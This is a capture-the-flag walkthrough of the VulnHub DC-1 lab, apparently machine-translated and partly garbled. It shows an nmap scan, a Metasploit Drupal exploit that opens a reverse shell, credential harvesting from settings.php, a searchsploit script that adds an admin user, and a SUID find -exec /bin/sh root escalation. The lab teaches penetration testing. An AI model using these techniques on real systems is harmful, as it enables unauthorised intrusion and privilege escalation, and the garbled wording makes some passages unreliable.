Linux remember a drone Capture The Flag | DC-1
Introduction : Some time ago has been pro forma ing, do not continue to update the blog, I want to learn, to update, and we would like to learn together and progress together during the winter vacation!
0X01 Main Point
- find command with special permission suid mention the right of command
- / Etc passwd and / tec / shadow acquisition / (if both can be obtained, by blasting john)
- Searchsploit understand and master the framework msf
- msf in the shell portion of the no-echo may be utilized python.pty module shell
0X02 text
Here is used vulnhub of DC1 of drone Linux, VM load the image after the discovery allows you to enter login account and password, it should be is a server. So get on the first drone attack aircraft destination IP.
The goal is to get IP sniffing port, nmap start after 172.20.10.9.
This -p-
parameter is specified all the ports are scanned, -sV
the parameter isVersion detection is used to scan version running on the target host and port software. It differs from other scanning techniques, it is not used to scan an open port on the target host, but it needs to obtain information from the open port the software to determine version need to use TCP SYN scan which ports are open before you use version detection scans.Get open 22、80/111/32850
these ports. We know that 80
the port is for HTTP, and 22
port is for SSH.
We found that Drupal is written in PHP open source content management framework, start msf !
Here we use rank: 2018 years of excellent vulnerabilities found can bounce shell!
Note: When you select should show options
see what is Required, we must all fill the last exploit
execution to be effective!
Found that only need to set rhost, set rhost 172.20.10.9
after setting, execution can bounce shell.
So that we successfully entered, see the directory foundFlag1
Tip said, "Every site has a log, you, you are no exception," so we went to the log, in this directory there is a web.config
looked futile found, keep looking! Found a CHANGELOG.txt
but is not authorized to open, is estimated to mention the right. Find another similar log PHP
settings.php found us see:
told flag2 and database user name and password, so we naturally idea is to log in to view the database user
and password
so were the beginning of page 80 port login, look inside information.
Mysql connections but found no echo in the shell msf, that we can not log in the database, where it uses the python pty module.
After a review of Python version is 2.7,13, so we use this module to get an interactive shell.
www-data user, on debian / ubuntu, www-data is the default user running a web service / group, typically generated during the installation procedure by the web service apt.
Now log Mysql, before some combination of the database name and password to connect.
After following the operation on conventional database look, look-up table, field investigation found that the following user and password, but the password is encrypted obviously, a very personal feeling burst through fees, but in fact read other bigwigs of the articles found with John the Ripper is relatively easy to get, but I did not succeed kali 2019 download good, so this period I can only practice the physical machine.
See two User, admin
and Fred
here continue to start searchsploitTo see what Drupal discovered vulnerabilities can be used, but we have come to know the current version in order to direct a targeted selection of the script. Found after traversing the various directories bootstrap.inc
have this file specification.
Drupal version 7.2.4, and now see searchsploit
theDrupalscript.
As the screenshot reasons, we can not see the purpose of each script (actually displayed), where we chose 34992.py this script, cat
see the script parameters need, you can use the direct construction.
The function of this script is to create a new user permissions, now re-mysql View users find:
Username: crispr Password: 123456 so that we get after logging into flag3.
Put right
- Log in as root (try using blasting unsuccessful)
- Ordinary users log on, the Find command has suid permission bits of shell to GET
suid permission: Description may execute commands with root privileges
Key words here are tips find
, , perms
, -exec
use the find
file has suid permissions because the file has suid permissions, the implementation process will use root access, so that we can make use of root privileges to view the / etc / passwd and / etc / shadow mainly know ** / etc / shadow **, which is stored various usersPassword hashIf we know what / etc / passwd know / etc / Shadow , you can be obtained by blasting the real password, so SSH connection root account to get flag.
flag4@DC-1:~$ touch getshell
flag4@DC-1:~$ find / -type f -name getshell -exec "whoami" \;
root
flag4@DC-1:~$ find / -type f -name getflag -exec "/bin/sh" \;
cd /root
ls
thefinalflag.txt
cat thefinalflag.txt
First pass here to build a file named getshell new file, and then perform the find to find, because the find has suid permission bits, it is possible to perform the exec
review is a root
privilege,
/bin/sh
在shell脚本的开头往往有一句话来定义使用哪种sh解释器来解释脚本。
目前常见的shell脚本中主要有以下两种方式:
(1) #!/bin/sh
(2) #!/bin/bash
注意:每个脚本开头都使用"#!","#!"实际上是一个2字节魔法数字,这是指定一个文件
类型的特殊标记,在这种情况下,指的就是一个可执行的脚本。在#!之后,接一个路径名,
这个路径名指定了一个解释脚本命令的程序,这个程序可以是shell,程序语言或者任意
一个通用程序。
sh是bash的一种特殊的模式,也就是 /bin/sh 相当于 /bin/bash --posix。说白了
sh就是开启了POSIX标准的bash 。
在一般的linux系统当中(如redhat),使用sh调用执行脚本相当于打开了
bash的POSIX标准模式
Get the final flag!